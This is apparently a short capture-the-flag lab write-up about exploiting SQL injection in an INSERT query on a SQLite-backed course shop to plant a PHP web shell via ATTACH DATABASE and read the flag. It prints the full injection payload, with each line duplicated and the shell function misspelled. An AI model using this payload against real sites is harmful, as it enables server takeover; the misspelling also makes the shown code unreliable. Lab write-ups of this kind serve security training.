June 16, 2026
Webverse-Pro Expression
lab write-up
0zex
2 min read
Discovery:
after signing-up ,the platform offers buying courses .
after you press enroll now :
we can see that the product we buy gets into our account ;
- meaning that it's getting added via a SQL query.
- our next step is to try triggering a SQL error:
as you can see we triggered a **SQL error ,**based on it we can see some signs of the database used:
- SQLSTATE[HY000] Generalerror
- near & quote;…
which means the database used is SQLITE.
Note:
- the database is not returning a value ,instead it's adding values to an existing table which means :
- the query is something like :**INSERT INTO (table) VALUES(**value1,value2)
- thus ,we need to escape the VALUES to exploit it.
EXPLOIT:
our goal is to achieve RCE via SQLi
Explanation of the payload :
x');x');- here we escaped the VALUES() and using ; we force the SQL engine to execute the next code separately.
ATTACH DATABASE '/var/www/html/shell2.php' AS sh2;ATTACH DATABASE '/var/www/html/shell2.php' AS sh2;- here we made a new PHP file in the web server's directory and added it's alias sh2.
CREATE TABLE sh2.pwn (c TEXT);CREATE TABLE sh2.pwn (c TEXT);- here we created a table named pwn which have a column c containing a text TEXT.
INSERT INTO sh2.pwn VALUES('<?php echo shel_exec($_GET[\"cmd\"]); ?>'); -- -INSERT INTO sh2.pwn VALUES('<?php echo shel_exec($_GET[\"cmd\"]); ?>'); -- -- here we inserted a php shell into our table which is inside our file .
Next , navigate to the file :
now read the flag .
we've achieved our goal.